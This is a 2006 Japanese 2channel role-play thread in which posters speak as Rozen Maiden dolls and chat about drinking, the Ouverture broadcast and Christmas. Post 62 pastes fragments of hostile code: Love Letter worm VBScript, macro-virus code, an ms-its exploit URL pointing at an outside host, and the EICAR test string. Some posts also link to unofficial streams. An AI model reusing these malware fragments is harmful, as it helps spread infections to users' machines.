2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ここだけ全員翠星石トロイメント

1 :翠星石:2006/12/22(金) 00:42:44
前スレですぅ
ここだけ全員翠星石 2
http://etc3.2ch.net/test/read.cgi/charaneta2/1165571341/
次スレは>>980こえてから立てるですぅ
立てる前に一言書き残しておくと乱立を防げるかもしれないですよ

え、えーと、こここ、ここだけ翠星石もさ、さ、三代目を迎えることがで、できたですぅ
翠星石たちの、お、おかげですぅ
こ、こんなもんで、いいですか?ふぃー、挨拶は緊張するです


2 :翠星石:2006/12/22(金) 00:44:31
スレ立て乙ですぅ

3 :真紅:2006/12/22(金) 00:44:52
なのだわ

4 :翠星石:2006/12/22(金) 00:45:32
>1
乙ですぅ。
さっそく乾杯するですよーーー!
翠星石達ー、グラスを持ちやがれですぅ。

5 :翠星石:2006/12/22(金) 00:48:15
かんぱーいですぅ!

6 :翠星石:2006/12/22(金) 00:49:15
くはぁー、眠たいですぅ、おやすみです

7 :蒼星石:2006/12/22(金) 00:49:42
翠星石、スレ立てお疲れ様

8 :翠星石:2006/12/22(金) 00:51:08


9 :薔薇水晶:2006/12/22(金) 00:53:32
今回だけは褒めてあげます・・・・
さすがですね。

10 :翠星石:2006/12/22(金) 00:57:12
とりあえず、飲めですぅ

11 :翠星石:2006/12/22(金) 01:08:01
ういーーーーっぷはぁですぅ

12 :蒼星石:2006/12/22(金) 01:32:31
久しぶりに来て見たけど
あいかわらず翠星石は
酒飲みだね・・・

13 :翠星石:2006/12/22(金) 01:38:22
激しく同意ですぅ
酒が飲めねー私は烏龍茶で乾杯だったですぅ。

14 :名無しになりきれ:2006/12/22(金) 01:53:42
いつのまにか新スレ立ったですね
>>1乙ィドリームですぅ

遅ればせながら翠星石も爆弾ハナタレで乾杯ですぅ

15 :翠星石:2006/12/22(金) 01:54:31
名前忘れたですぅ・・・orz

16 :名無しになりきれ:2006/12/22(金) 02:07:08
翠星石ってタラちゃんとしゃべり方似てね?

17 :翠星石:2006/12/22(金) 02:19:07
なにいうですかぁ全然にてないですぅ。

18 :翠星石:2006/12/22(金) 02:46:13
酔っ払ったのでそろそろ寝ますぅ

19 :翠星石:2006/12/22(金) 03:29:16
今帰ってきたですぅ
とりあえず新スレ乙と言ってやるですぅ

20 :蒼星石:2006/12/22(金) 03:40:20
翠星石、お疲れ様
とりあえずお茶でも飲みなよ・・つ旦~

21 :翠星石:2006/12/22(金) 07:00:23
朝が来たですぅ

22 :翠星石:2006/12/22(金) 07:39:08
オーベルテューレやるですよー!

23 :水銀燈:2006/12/22(金) 10:53:11
貰っちゃった
貰っちゃったぁ・・・
オリオンビールぅ
朝から飲むわぁ
とりあえず翠星石パート3おめでたいわぁ

24 :名無しになりきれ:2006/12/22(金) 11:50:15
2位キープすれば殿堂入り
http://www.37vote.net/anime/1166276039/all-50-10

25 :翠星石:2006/12/22(金) 13:27:37
ここってオーベルのネタバレはありなんですか?

26 :翠星石:2006/12/22(金) 14:21:17
見られない地域の翠星石もいるので避けたほうがいいと思うですぅ

そういう翠星石も見れない地域ですけど・・・

27 :翠星石:2006/12/22(金) 14:28:16
それじゃあBSiの放送が終わるまでは自粛するですぅ

28 :翠星石:2006/12/22(金) 14:35:32
ネタバレは極力避けた方がいいですね。というわけで誘導しといてやるですぅ

Rozen Maiden ローゼンメイデンオーベルテューレ 3
http://anime.2ch.net/test/read.cgi/anime/1166630108/
オーベルの話はこっちでするといいですぅ

ローゼンメイデン オーベルテューレ前編 実況スレ
http://live23.2ch.net/test/read.cgi/livetbs/1166720559/
こっちは実況スレですぅ




29 :翠星石:2006/12/22(金) 18:56:14
某ファイル交換ソフトを使用してオーベルテューレを見るのもいいですねー。

30 :翠星石:2006/12/22(金) 19:10:15
通報したですぅ

31 :翠星石:2006/12/22(金) 19:13:10
今日は酒盛するですか?

32 :翠星石:2006/12/22(金) 20:02:51
イーヒッヒッヒッヒッ、酒じゃなくて毒も盛ってやるですぅ

33 :翠星石:2006/12/22(金) 20:33:19


34 :メイメイ:2006/12/22(金) 21:25:05
〜〜〜*【大腸菌】

35 :翠星石:2006/12/22(金) 21:31:51
どうせ放送終了後1間後にはようつべにうpされてるにちげーねぇですぅ

36 :翠星石:2006/12/22(金) 22:47:01
そうですぅ、ちげーねーですぅ!!

37 :翠星石:2006/12/22(金) 23:11:10
チビ苺ー、酒を持ってきやがれですぅ!

38 :翠星石:2006/12/22(金) 23:21:13
酒まだですか

39 :翠星石:2006/12/22(金) 23:30:54
翠星石も飲みながらオーベルテューレ見てぇのですが 明日仕事ですぅ!!

40 :翠星石:2006/12/22(金) 23:31:51
翠星石の出番が多いといいですねぇ

41 :スィドリーム:2006/12/22(金) 23:45:11
〜〜〜*【スーパードライ】

42 :翠星石:2006/12/22(金) 23:52:38
こいつはなかなか気が利くスィドリームですぅ
ありがたくいただくとするですよ

43 :名無しになりきれ:2006/12/22(金) 23:59:02
今日のローゼンなくなったの??

44 :翠星石:2006/12/23(土) 00:00:20
そのウソほんとですぅ?

45 :名無しになりきれ:2006/12/23(土) 00:05:57
何か,うちは地デジとうさいの液晶で、((スマソじまんじゃなかとよ
番組表っち欄がでるんやけんど、そこの3:30〜は≪クロージング≫っち書いてあるけん,,,
しかも,新聞にものっとらんとよ!!こりゃあもんだいじゃぁ!!


46 :翠星石:2006/12/23(土) 00:07:13
見れない人間はベッドにうずくまって悶々としていればいいのですぅ

47 :翠星石:2006/12/23(土) 00:08:32
翠星石なんて一期も二期も全く観たことないですぅ

48 :翠星石:2006/12/23(土) 00:09:56
ぇぇぇ!!!
せっかく学校で話題になってたからたのしみにしてたのにぃ

49 :翠星石:2006/12/23(土) 00:10:33
1期はレンタルしてるですよ
2期もしかるべき手段をつかえば見れないこともないですぅ

50 :翠星石:2006/12/23(土) 00:12:10
翠星石は携帯厨ですから二期は観られる気がしないですぅ

51 :翠星石:2006/12/23(土) 00:14:18
どぉなってるのですかぁ???
翠星石にはまったくわからないですぅ・・・
誰か,関西の方いますかぁ??

52 :翠星石:2006/12/23(土) 00:15:42
オーベルテゥーレはTBS系じゃなくてT B S だ!
だから地方はもちろんの事、C B C(名古屋) もM B S(大阪) でもやらない。
つまり関東地方(東京・神奈川・千葉・埼玉・茨城・群馬・栃木)に住んでる奴以外は見 れ な い と言う事。
まぁ山梨や長野・静岡じゃケーブルTVの再送信がある奴は見れるし、大東諸島(沖縄)でも見れるけどね。
      ____        。
    く/',二二ヽ>    /                                     
     |l |ノノイハ))  /  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
     |l |リ゚ ー゚ノl| /  < まぁ地方民は指くわえながら実況板でも見てろ!ですぅ。
     ノl_|(l_介」つ     \
    ≦ノ`ヽノヘ≧       ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   ミく二二二〉ミ

53 :翠星石:2006/12/23(土) 00:19:01
BS-iでの放送,関西でやるのかなぁ?・

54 :翠星石:2006/12/23(土) 00:24:41
>53
BSですから、関西でも放送するですよー!

55 :翠星石:2006/12/23(土) 00:31:41
わかりましたですぅ!!ありがとうですぅ!!
今日無いっての納得いかないので,時間までおきとくですぅ!!

56 :翠星石:2006/12/23(土) 00:48:15
地方民の翠星石達ー、酒盛をするですよー!!

57 :名無しになりきれ:2006/12/23(土) 00:54:02
やっほー

58 :翠星石:2006/12/23(土) 00:54:03
オーベルのネタバレはご法度の方向で決まったのですね
とゆーことは、全放送の終わる1月18日まではネタバレは駄目ってことですか
でも、IDも何も出ない板ですから、ネタバレする人間があらわれたらNGにすることもできねぇですね
まあ個々の良識に任せるしかないですぅ

59 :翠星石:2006/12/23(土) 01:05:54
1/18までまてないですぅ!!!

60 :翠星石:2006/12/23(土) 01:19:42
わざわざここでネタバレすることねーですよ
他に探せばいっくらでもありやがりますし
そんなことより酒持ってこい!ですぅ

61 :スィドリーム:2006/12/23(土) 01:34:23
〜〜〜*【エビスビール】

62 :名無しになりきれ:2006/12/23(土) 01:34:29
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

63 :翠星石:2006/12/23(土) 01:40:01
           ,..-─‐-..、
            /.: : : : : : : .ヽ
          R: : : :. : pq: :i}
           |:.i} : : : :_{: :.レ′
          ノr┴-<」: :j|
        /:r仁ニ= ノ:.ノ|!           _
          /:/ = /: :/ }!        |〕)  コツン
       {;ハ__,イ: :f  |       /´
       /     }rヘ ├--r─y/
     /     r'‐-| ├-┴〆    _, 、_  '⌒ ☆
      仁二ニ_‐-イ  | |      ∩`Д´)
      | l i  厂  ̄ニニ¬      ノ  ⊂ノ    < ヤダヤダー!!
     ,ゝ、 \ \   __厂`ヽ    (__ ̄) )←ジュン
     / /\_i⌒ト、_   ノrr- }     し'し′
   └-' ̄. |  |_二二._」」__ノ


64 :翠星石:2006/12/23(土) 01:46:09
誰か起きてるですか?

65 :翠星石:2006/12/23(土) 01:49:45
起きてるですよー?
地方民な翠星石は酒を飲んで悔しさを紛らわしてるですぅ!!

66 :翠星石:2006/12/23(土) 01:52:03
翠星石もいるですよ
親父がテレビ独占してるからオーベルテューレ見られるか微妙ですぅ

67 :翠星石:2006/12/23(土) 01:52:56
>66
チャンネルを奪いやがれですぅ。

68 :翠星石:2006/12/23(土) 01:53:28
>>66
とられるまえにとれ です

69 :翠星石:2006/12/23(土) 01:53:51
>>67
それを言うならリモコンですぅ

70 :翠星石:2006/12/23(土) 01:56:41
関東外の翠星石達は起きてるですかーー?

71 :翠星石:2006/12/23(土) 01:57:19
>67-69
ありがとですぅ、頑張ってみるですぅ
お、おじじなんかには負けんですよっ!

72 :翠星石:2006/12/23(土) 01:57:44
>>70
起きてるですぅ

73 :翠星石:2006/12/23(土) 01:57:46
起きてるですぅー

74 :翠星石:2006/12/23(土) 01:59:16
オーベルテューレってなんですか?

75 :翠星石:2006/12/23(土) 02:06:51
>>74
ラクロスの死合いを実況中継するという番組ですぅ

76 :翠星石:2006/12/23(土) 02:12:57
関東外の翠星石達ー、酒盛をするですよ!

77 :翠星石:2006/12/23(土) 02:14:53
酒どんどん持って来いですぅ

78 :スィドリーム:2006/12/23(土) 02:17:06
〜〜〜*【大吟醸】

79 :翠星石:2006/12/23(土) 02:18:43
なんべんも言ってるですよ!
日本酒は飲めねーです!
まったく使えねー人工精霊ですぅ

80 :スィドリーム:2006/12/23(土) 02:21:16
〜〜〜*【カロリ】

81 :翠星石:2006/12/23(土) 02:23:29
翠星石は腹減ったですぅ

82 :雛苺:2006/12/23(土) 02:27:35
〜〜〜*【うにゅぅ】

83 :翠星石:2006/12/23(土) 02:28:48
翠にも酒よこせですぅ

84 :翠星石:2006/12/23(土) 02:30:17
今夜は飲みまくるですよ
おめーらも付き合えですぅ

85 :翠星石:2006/12/23(土) 02:31:59
とことん付き合うですよーー!
翠星石は、テキーラでかんぱーーいですぅ。

86 :翠星石:2006/12/23(土) 02:33:42
飲みすぎはダメですぅ

87 :水銀燈:2006/12/23(土) 02:34:35
やけ酒なら付き合うわよぅ

88 :翠星石:2006/12/23(土) 02:35:18
>>86
そんなこと言わず、おめーも飲むですぅ

89 :翠星石:2006/12/23(土) 02:36:52
酒が足りねーですぅ
早く持って来いですぅー

90 :水銀燈:2006/12/23(土) 02:37:13
あと残り20数分で関東地区の人間を酒でジャンクにしてあげるわぁ

91 :翠星石:2006/12/23(土) 02:37:14
>87
水銀燈も付き合えですぅ!

つ【二階堂(カルピス割り)】

92 :翠星石:2006/12/23(土) 02:38:21
関東のドール達がうらやましいですぅ…

93 :翠星石:2006/12/23(土) 02:42:20
テレビ局に文句言ってやるですぅ

94 :水銀燈:2006/12/23(土) 02:42:35
>>91
貰っておくわぁ

95 :翠星石:2006/12/23(土) 02:44:39
           ,..-─‐-..、
            /.: : : : : : : .ヽ
          R: : : :. : pq: :i}
           |:.i} : : : :_{: :.レ′
          ノr┴-<」: :j|
        /:r仁ニ= ノ:.ノ|!           _
          /:/ = /: :/ }!        |〕)  コツン
       {;ハ__,イ: :f  |       /´
       /     }rヘ ├--r─y/
     /     r'‐-| ├-┴〆    _, 、_  '⌒ ☆
      仁二ニ_‐-イ  | |      ∩`Д´)
      | l i  厂  ̄ニニ¬      ノ  ⊂ノ    < ヤダヤダー!!
     ,ゝ、 \ \   __厂`ヽ    (__ ̄) )←関東地区の人
     / /\_i⌒ト、_   ノrr- }     し'し′
   └-' ̄. |  |_二二._」」__ノ

96 :翠星石:2006/12/23(土) 02:44:41
翠星石は福岡在住ですぅ…。
RKBに文句を言いたいですぅ!!!

97 :翠星石:2006/12/23(土) 02:45:09
ふう、セーフセーフ、なんとかオーベル見れそうです

98 :翠星石:2006/12/23(土) 02:46:29
>>97
早速自慢ですかー?

99 :翠星石:2006/12/23(土) 02:47:46
↓100getおめでとーですぅ

100 :翠星石:2006/12/23(土) 02:48:39
>>97
ケミカル焼酎の乳酸菌割りでもグイッと飲んで寝るですよ

101 :翠星石:2006/12/23(土) 02:56:09
大量の酒持って来いですぅ

102 :水銀燈:2006/12/23(土) 02:57:51
実況板のジャンク達がはしゃいでるわねぇ

103 :翠星石:2006/12/23(土) 03:02:20
もう寝てやるですぅ。
おやすみなさーいですぅ!!!

104 :水銀燈:2006/12/23(土) 03:04:36
わたしもメグの布団に潜り込んで寝ることにするわぁ
おやすみぃ>>翠星石

105 :翠星石:2006/12/23(土) 03:11:37
おやすみですぅ

106 :翠星石:2006/12/23(土) 03:11:54
>>102
  釣られましたか   釣りますか 

107 :翠星石:2006/12/23(土) 03:14:16
テレビ局ぶっ潰してやるですぅ

108 :翠星石:2006/12/23(土) 03:23:47
翠星石も加勢するですぅ!!!!

109 :翠星石:2006/12/23(土) 03:25:21
ガセかもわかんねーですけど拾ってきたですぅ

http://chike.tv:9000

>このURLをウィンドウズメディアプレイヤーにいれれば
>地方の人でも3時29〜のローゼンメイデンがみれる!
>WMPを起動してファイル→URLを開く→http://chike.tv:9000
>でOK!
>インストールとかないから安心だよ


110 :翠星石:2006/12/23(土) 03:28:38
>>109
ページがみつからねぇーって言われるですぅ

111 :翠星石:2006/12/23(土) 03:30:55
>>109
みられたですぅ

112 :翠星石:2006/12/23(土) 03:30:58
>>110
うちはリアルで見れてるですよ
リンクを踏むとダメなのです

つーかはじままった

113 :翠星石:2006/12/23(土) 03:35:17
>109
みれねーですぅ…(涙)

114 :翠星石:2006/12/23(土) 03:42:42
みれねぇーですよ
(´・ω・`)ショボーン

115 :翠星石:2006/12/23(土) 03:46:45
CM中ですぅ

>>113-114
>>109を良く読めです

116 :翠星石:2006/12/23(土) 04:00:01
終わったですぅ
2月21日DVD発売だそうなのですぅ

117 :翠星石:2006/12/23(土) 04:00:55
結局見れなかったです

118 :翠星石:2006/12/23(土) 04:05:12
>>109で最初から最後まで見れましたが
後日料金請求とかしやがるのかと心配で朝も眠れませんですう

119 :翠星石:2006/12/23(土) 04:10:10
>109で見れたですぅ
CM中に一旦落ちたですけど再接続したら見れましたよ
水銀燈あいとーあいとー ですぅ

120 :翠星石:2006/12/23(土) 04:20:17
明日も同じアドレスで見れるですよねー?

121 :翠星石:2006/12/23(土) 04:50:07
あー疲れたですぅ
この余韻をひきずってこのまま夢の世界にダイブするですぅ、おーやすみぃですー

122 :名無しになりきれ:2006/12/23(土) 05:02:10
おやすみなさい

123 :翠星石:2006/12/23(土) 05:17:40
ようつべはまだですか?

124 :JUN:2006/12/23(土) 06:30:00
ようつべ汚くないか?
僕はステロク待ち 中々きそうにないけど

125 :翠星石:2006/12/23(土) 14:26:02
おはようですぅ
もう昼ですけど

126 :翠星石:2006/12/23(土) 14:54:23
こんな時間におはようとは、昨日夜更かししたですね

127 :翠星石:2006/12/23(土) 15:13:18
今日も夜更かしするですよー

128 :翠星石:2006/12/23(土) 17:36:09
そうです、酒盛しながら夜更かしするですぅ!


129 :翠星石:2006/12/23(土) 17:58:54
またトロ10話みて泣いてしまったですぅ

130 :翠星石:2006/12/23(土) 18:06:35
蒼星石が倒れたときよりも泣けるですぅ

131 :翠星石:2006/12/23(土) 18:09:04
思い出せばいつでもどこでも泣けるですぅ女優並みですぅ

132 :翠星石:2006/12/23(土) 18:51:00
うそ泣きですぅ

133 :翠星石:2006/12/23(土) 18:51:26
涙は翠星石の武器ですよ

134 :翠星石:2006/12/23(土) 22:02:48
ガンプラ組むですぅ♪

135 :翠星石:2006/12/23(土) 22:10:46
お前がパーツをなくしたり折ったりしないように祈ってやるですぅ

136 :翠星石:2006/12/23(土) 22:47:58
明日はクリスマスですねぇ
翠星石達は何か予定はあるですか?

137 :翠星石:2006/12/23(土) 22:50:43
>>136
翠星石は一人ぼっちのクリスマスですぅ

138 :翠星石:2006/12/23(土) 22:59:11
24、25共に仕事の翠星石は勝ち組ですぅ♪

…あ、あれ…目からしょっぱい水が…

139 :翠星石:2006/12/23(土) 22:59:34
>>136
日曜日の夜に浮かれてなんていられねーです
月曜日にそなえてたっぷりアルコール分を補給するですよ

140 :翠星石:2006/12/23(土) 23:08:35
>>138
翠星石がクリスマスを満喫しているその時もキリキリ働けるなんて、尊敬しちゃうですぅ

141 :翠星石:2006/12/23(土) 23:17:10
プレゼントが欲しいです〜
PS3にアーマードコア4をセットで欲しいですぅ

142 :翠星石:2006/12/23(土) 23:27:15
>138
同志がいるですぅ…

143 :翠星石:2006/12/23(土) 23:38:09
12月24日は単なる日曜日ですぅ!!












あれっ、目から汗が出てきてるですぅ…

144 :翠星石:2006/12/23(土) 23:44:31
ヤケ酒ですぅ!!

145 :水銀燈:2006/12/23(土) 23:45:41
哀れな翠星石達にプレゼントよぅ つ【乳酸菌】

146 :翠星石:2006/12/23(土) 23:46:13
クリスマスなんてシラネーですぅ


147 :JUM:2006/12/24(日) 00:11:12
            | | |    | |                  , '   ク 
            | | |    | |                  /    リ
            | |⊥_    | |    _,, -‐   、_      ,'    ス
        _,レ":::::::`  |_|_/´        ` 、  ,l     マ
       /"::::::::::::::::::::l.   /::/ / , , /  , ,  , ,、\ l      ス
      /::::::::::::::::::::::::::l  /:::/ l, l //:.// /::/:..://:ヘ ヾ     の
      ヽ::::::::::::::::::::::::::/ /::::l':: ll l :::::::l///::::::/://::::l::ll:::::l.    予
       |::::::::::::::::::::::::l' /::::::l:: l:::l ::::::l//::::::::///:/l:l':::|l:::::l     定
       l:::::::::::::::::::::::::l l:::::::::::.l::::l:::::::l/::::::∠'_//||' |l.l::::;lヽ   ?    /
       l_:::::::::::::::::::::_l  l:::::::::::.l::::.l:::::l/r=-'t、/` /_l//::/ ̄ヽ     /
       l::::::::::::::::::::::l  l;;::::::::::.|::::::::l| ゞ=ソ `  rt`/::/   `ー - ‐'´
         l:::::::::::::::::::::l、   \:::::::::丶::l|        ,゛/:/'
     , -┴‐ 、::::::::::::|ヽ||l|  ヽ;:::;ヘ::ヽ    ‐ ./'"
    /      \:::::::|::ヽl|  /' '  ` ,ヘ_ , -//"
   /'  寝  オ  ヽ::::|、:::ヽ /_,,,,,,,,,,,,l__ _,
  /   る  ナ  ヽ::|' ̄`'"::::::::::::::::::/'┴-、
  l'    だ  二   l::|:::::::::::::::::::::::::/     `l
  l    け   l    l::l::::::::::::, -‐'/     . : ::|
  |    で  し    |::|::::::::ヽ  /        ,l.
  |    す  て     |::|:;-=、V /.: : ::     / l
  、   よ        l:::l ̄ ̄` |::l::      / l

148 :翠星石:2006/12/24(日) 00:18:46
巴ったらよくわかってるですぅ

149 :翠星石:2006/12/24(日) 00:28:04
今日も飲むですよ

150 :翠星石:2006/12/24(日) 00:29:18
>149
翠星石もウイスキーで付き合うですよー。

151 :翠星石:2006/12/24(日) 00:33:48
あまり飲みすぎるなですぅ

152 :翠星石:2006/12/24(日) 00:34:38
いつもいつも飲んだくれて駄目なやつらですぅ

153 :翠星石:2006/12/24(日) 00:41:53
さぁ、おめーらも飲めですぅ

154 :翠星石:2006/12/24(日) 01:04:17
酒はうめーですぅ

155 :翠星石:2006/12/24(日) 01:17:37
水銀燈スレも2代目に入ったですね
姉妹スレ姉妹スレってよく言うですけど、まさに姉妹スレですぅ


156 :翠星石:2006/12/24(日) 01:22:42
上げるですよ

157 :翠星石:2006/12/24(日) 01:31:14
もう一回ageるですぅ

158 :翠星石:2006/12/24(日) 01:35:00
誰もこねーですよ

159 :翠星石:2006/12/24(日) 01:36:15
酒の話になると絡みづらいから傍観してるんですぅ

160 :翠星石:2006/12/24(日) 01:37:06
もはや翠星石=酒臭いのイメージですぅ

161 :翠星石:2006/12/24(日) 01:38:29
勘弁してほしいですぅ
それはそうと、特別編まであとちょっとですので、実況スレいってくるですぅ

162 :翠星石:2006/12/24(日) 01:39:17
絡めない翠星石が、水銀燈や真紅のスレに遊びに行ってる気がするですぅ

163 :翠星石:2006/12/24(日) 01:40:01
水銀燈のスレは健康的な流れなのですよ

164 :翠星石:2006/12/24(日) 01:40:57
さすが長女ですね

165 :翠星石:2006/12/24(日) 01:41:02
>>162
むしろ掛け持ちのお陰でお互い繁栄してるとおもうですぅ

166 :翠星石:2006/12/24(日) 01:45:04
確かに流れは水銀燈の方が自然ですぅ
真紅の所は真紅を弄るスレになってるですよ

167 :翠星石:2006/12/24(日) 01:47:49
銀ちゃんファンが多いと思うのです

168 :真紅:2006/12/24(日) 01:49:05
掛け持ちやゲストとして遊びに行くのもありだと思うわ

169 :翠星石:2006/12/24(日) 01:49:29
オーベルで一気に増えた気がするですね

170 :翠星石:2006/12/24(日) 01:49:33
しゃぶったらたててくれるんですか?

171 :翠星石:2006/12/24(日) 01:50:16
翠星石はドジですぅ、誤爆しちまったです

172 :翠星石:2006/12/24(日) 01:51:03
非常に気になる内容の誤爆なんかするんじゃねえですぅ

173 :翠星石:2006/12/24(日) 01:51:09
ハードディスクのアクセスランプが激しく光っていやがるので
スーパーハッカーに不正侵入されてるかと思ったら
ウィンドウズディフェンダーが勝手に仕事していやがったですぅ

174 :翠星石:2006/12/24(日) 01:51:56
おまえのパソコン、何か住んでやがるですね

175 :翠星石:2006/12/24(日) 01:52:17
水銀燈の場所に誤爆しようものなら、
お馬鹿さん呼ばわりされるから危なかったですねぇ

176 :翠星石:2006/12/24(日) 01:53:49
水銀燈はそこのところ寛容ですから…たぶん

177 :水銀燈:2006/12/24(日) 01:54:39
しゃぶったらたててくれるんですか?


178 :水銀燈:2006/12/24(日) 01:55:12
あらいけない 誤爆しちゃったぁ〜

179 :翠星石:2006/12/24(日) 01:55:15
>>177
たてますか  しゃぶりますか

180 :翠星石:2006/12/24(日) 01:57:26
やっぱり水銀燈はろくでなしですね

181 :蒼星石:2006/12/24(日) 02:00:30
たてます!

182 :翠星石:2006/12/24(日) 02:02:21
>>181
真紅の次スレ立て決定ですぅ

183 :蒼星石:2006/12/24(日) 02:06:02
あれ、なんかノロウイルスにかかったみたいだ
後は頼んだよ

184 :翠星石:2006/12/24(日) 02:06:58
>>183
逃げるなですぅ

185 :JUN:2006/12/24(日) 02:22:41
真紅スレも立てられたみたいだしプレゼントってわけでもないけど・・・

ttp://divx-635.vo.llnwd.net/stage6vid/1063513.divx
青いバーが最後までいったら右クリメニューでsave videoってのがでると思う
保存してからのほうが見やすいよ 
メディアプレイヤーでもリアルプレイヤーでも見れるから



186 :翠星石:2006/12/24(日) 02:29:49
ジュン、ベッドで待ってるですよ

187 :翠星石:2006/12/24(日) 02:32:32
翠星石も一緒に寝るですぅ

188 :翠星石:2006/12/24(日) 02:36:33
ドールは鞄で寝るもんですぅ!

189 :蒼星石:2006/12/24(日) 02:55:56
暇だね

190 :翠星石:2006/12/24(日) 02:56:45
ヒマですよ

191 :翠星石:2006/12/24(日) 02:57:24
水銀燈スレにあるurlで前編後編みてきたらいいですぅ

192 :翠星石:2006/12/24(日) 02:59:12
後編はまだですよ
今はウィンターガーデン放送中ですぅ

193 :翠星石:2006/12/24(日) 03:00:35
そうですね、じゃあジュンの貼ったアドで前編見てくるです

194 :翠星石:2006/12/24(日) 03:02:47
>>193
棘のあるレスなのですのだ

195 :翠星石:2006/12/24(日) 03:13:24
今日は飲んで寝るだけです

196 :翠星石:2006/12/24(日) 03:55:07
オーベル見終わったですぅ
はぁ・・・水銀党員になっちまったです

197 :翠星石:2006/12/24(日) 03:59:38
見れなかったですぅー

198 :翠星石:2006/12/24(日) 06:21:03
朝ですぅ

199 :翠星石:2006/12/24(日) 06:32:09
暗いですまだ夜です

200 :名無しになりきれ:2006/12/24(日) 06:34:04
しゃーねーから仕事にイクですぅ・・・・
寒いと関節がきしみやがるですぅ。

201 :翠星石:2006/12/24(日) 08:39:55
[今夜はクリスマスイヴ酒盛り]

202 :翠星石:2006/12/24(日) 13:56:33
もう酒ネタは飽きつつあるですよ!
クリスマスなんだからクリスマスらしいネタ考えるか
マッタリ雑談すればいいです!

それじゃ翠星石はのりの所へでも行って、手伝いをしてくるです。
その後、ちび人間とちび苺をクリスマスらしいいたずらを仕掛けて
スカッとするですよー!

203 :翠星石:2006/12/24(日) 14:06:52
いつものヘッドドレスを外してサンタ帽を被るのですよ

204 :翠星石:2006/12/24(日) 15:14:53
      __,,..,,_  
   Oヽ;;;:::::::ヽ   ♪
     ⊂ニニ⊃    
     |l |ノノイハ)) 
      |l |リ゚ ー゚ノl| 
     ノl_|(l_介」).|
    ≦ノ`ヽノヘ≧ 
.   ミく二二二〉ミ 

205 :蒼星石:2006/12/24(日) 15:42:21
    _______ 〇
  /; ;: ::::ィ
  (ニニニニ)  ♪
 i´ノノノヽ)))
  Wリ゚ -゚ノリ
  ⊂)_介」つ
   〈__l__〉
   〈_ハ_〉

206 :翠星石:2006/12/24(日) 16:08:34
クッリスッマスーですぅ
予定…?

207 :翠星石:2006/12/24(日) 16:27:55
イブ?仕事に決まってるですぅ
クリスマス?関係ねーよですぅ

208 :翠星石:2006/12/24(日) 16:29:02
泣いたですぅ

209 :翠星石:2006/12/24(日) 17:59:48
生きていればきっといいことあるかもしれんですぅ・・・
保障はしませんけど・・・

210 :翠星石:2006/12/24(日) 19:44:50
マゾな考え方ですね

211 :翠星石:2006/12/24(日) 22:39:19
.: : : : : : : : :: :::: :: :: : :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::☆:::::::+::::::::::::::
  . . : : : ::::/⌒ヽ: ::: :: : :::: :: ::: ::: :::::::::::::::::::::::::..,,::。:+:::::::::::::::::::::::
  . .... ..::::/  <`O:: :: ::: :::::: :::::::::::: : :::::::::::::::::::+,::o;;::・;,:::::::::::::::::::::
     ⊂ニニニ⊃. . .: : : ::: : :: ::::::::: ::::::::::::::::..<;;::・,,::;ゞ;;o;*::.:::::::::::
     /:彡ミ゛ヽ;)ー、. . .: : : :::::: ::::::::::::::::,,;;;<;+::;;;´;*::o*:,,;;ゞ;;::::::::
    ./ /ヽ/ヽ、ヽ  i. . .: : : :::::::: :::::::::::;;;*;;;〇;ゞ;*::;;:<;;;*;:;ゞ;;o;
   / / 。  ヽ ヽ l   :. :. .:: : :: ::<;;;;〇;ゞ;*::o,ゞ ;*;;;;*ゞ;*:o
  ̄(_,ノ  ̄ ̄ ̄ヽ、_ノ ̄ ̄     ;;;*;;;〇;ゞ;*::;;;;;*ゞ;*::o, 〇;;; *
                       : : : : : : llllllll : : : : : :
                           田田田

212 :翠星石になりきれ:2006/12/24(日) 23:07:39
結局、今年のクリスマスも
一人で迎えることになったですぅ
ハァ・・・

213 :翠星石:2006/12/24(日) 23:13:44
翠星石が一緒に祝ってやるですから元気出せですぅ

214 :蒼星石:2006/12/24(日) 23:16:42
一人きりのクリスマスを過ごす>>212を祝ってあげようなんて翠星石らしいよ

215 :名無しになりきれ:2006/12/24(日) 23:22:16
ええーい!暗いです、このへっぽこぽこのすけー!

216 :翠星石:2006/12/24(日) 23:22:50
名前忘れたじゃないですかぁー!

217 :翠星石:2006/12/24(日) 23:23:28
厳かに、いや密やかにですかね
メリークリスマスと言っておくですよ

218 :翠星石:2006/12/24(日) 23:30:27
